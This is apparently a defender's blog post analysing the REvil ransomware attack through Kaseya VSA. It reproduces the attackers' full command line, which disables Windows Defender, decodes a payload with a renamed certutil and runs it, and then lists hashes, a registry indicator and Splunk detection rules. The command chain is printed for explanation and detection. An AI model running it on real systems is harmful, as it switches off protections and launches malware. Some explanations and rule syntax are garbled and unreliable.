As someone who has a history of working for MSP's, today might be one of the most memorable days for the remainder of my life. A very reputble hacking group "Re-evil" has hacked the most used tool by IT companies for device access and administration, "Kaseya". This brings me to learn and produce a an appropriate response to the the attack, and share with others.
Summary:
I will first go into the basic flow and operation of the attack, and then a deep dive into the IOC's we should look for, and a deeper dive into each one. From here I have worked with the community to develop and create SIEM rules surrounding these attacks. Quite often SIEM or SaaS services will not provide you with the logic behind their custom events, which can leave a security team between a rock and a hard place.
Flow
The Kaseya VSA agent will drop a cert file, "agent.crt" in the c:\kworking folder which then gest distributed as a Kaseya updates with the name 'Kaseya VSA Agent Hot-fix'
Powershell is then executed and attempted to decode the certificate 'agent.crt' with the windows certutil.exe bunary. From here is extracts the decoded agent and redirects this in a file named agent.exe within the same folder.
From here the agent.exe is signed using a malicious certificate with MsMpEng.exe and mpsvc.dll embedded into the certificate and it unpacks as MsMoEng.exe and mpsvc.dll in the C:\Windows folder
Below is a screen shot of the agent.exe extracting and launching the embedded files.
MsMPEng.exe is a out of date version of a legitimate Microsoft Defender .exe. which is used as a living off the land binary or LOLBin as the malware does not make callbacks home. So native binaries avoiding triggering SIEM or other detection rule sets,
Specific commands
Ransomware encryptor is dropped to c:\kworking\agent.exe
The VSA procedure is named "Kaseya VSA Agent Hot-fix”
At least two tasks run the following:
"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
Break down
C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul
Specifies arguments to be passed
Ping - A command often used for testing communications with another device
-n - number of requests to send = 4979
> nul - hide the output by redirecting the ping results to nowhere.
& C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Set-MpPreference - Lets you configure preferences for Windows Defender
DisableRealtimeMonitoring $true - This command disables windows defender real time monitoring
DisableIntrusionPreventionSystem $true - Responsible for network protection against exploitation of known vulnerabilities
DisableIOAVProtection $true - Indicates whether Defender will scan downloaded files and attachments.
DisableScriptScanning $true - Determines whether to disable scanning scripts during regular scans
EnableControlledFolderAccess Disabled - Responsible for blocking unauthorized access to folders
EnableNetworkProtection AuditMode -Force - Places windows defender Network Protection into AuditMode, which speculations suggests this hides pop ups or warnings that you may receive if it was switched in an off state.
MAPSReporting Disabled - This effectively enables telemtry data to be sent to the Microsoft threat community.
SubmitSamplesConsent NeverSend - This effectively tells windows defender not to send threat reporting samples to Microsoft
& copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >>
Copies over the cerutil.exe to the C:\windows directory and renames the file to cert.exe
Calls cert.exe and
C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe
Passing random input to cer.exe and decoding the kaseya crt and redirecting output into agent.exe
& del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
Delete the above certificates and PE files.
Files observed
C:\windows\cert.exe
36a71c6ac77db619e18f701be47d79306459ff1550b0c92da47b8c46e2ec0752
C:\windows\msmpeng.exe
33bc14d231a4afaa18f06513766d5f69d8b88f1e697cd127d24fb4b72ad44c7a
C:\kworking\agent.crt
C:\Windows\mpsvc.dll
8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd
C:\kworking\agent.exe
d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e
Registry Keys
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\BlackLivesMatter
Domains
One of the domains showed up under pastebin, and referenced a config file by the group which returned a larger list of domains used by them.
Interestingly enough the http:// page displays nothing from the community.
However under just the domain name without the prefix, we have a community mention of a pastebin file.
The hash is directly related to their malware.
Below is a brief description of the groups malware.
The domain list related to the Kaseya attack.
Custom Splunk Based SIEM Rules
Domain detection
First create a look up table and load the bad host names.
[|inputlookup bad_domains.csv]
Create a rule that defines log source, and evaluates network logs by hostname, and if the host name equals hostnames in the lookup table, direction output to nothing but iterate a counter based on action counts.
index=(Network logs) source=(Network source)
| eval hostname=name(destinationhostname)
| eval suspicioushost=if(hostname = [lookup table], null)
| fillnull suspicioushost
| stats count by action, suspicioushost
Registry Key Detection
index="windows" sourcetype=WinRegistry disabled = 0 type=set OR type=create OR type=delete OR type=rename key_path="HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\BlackLivesMatter"
File obersavtion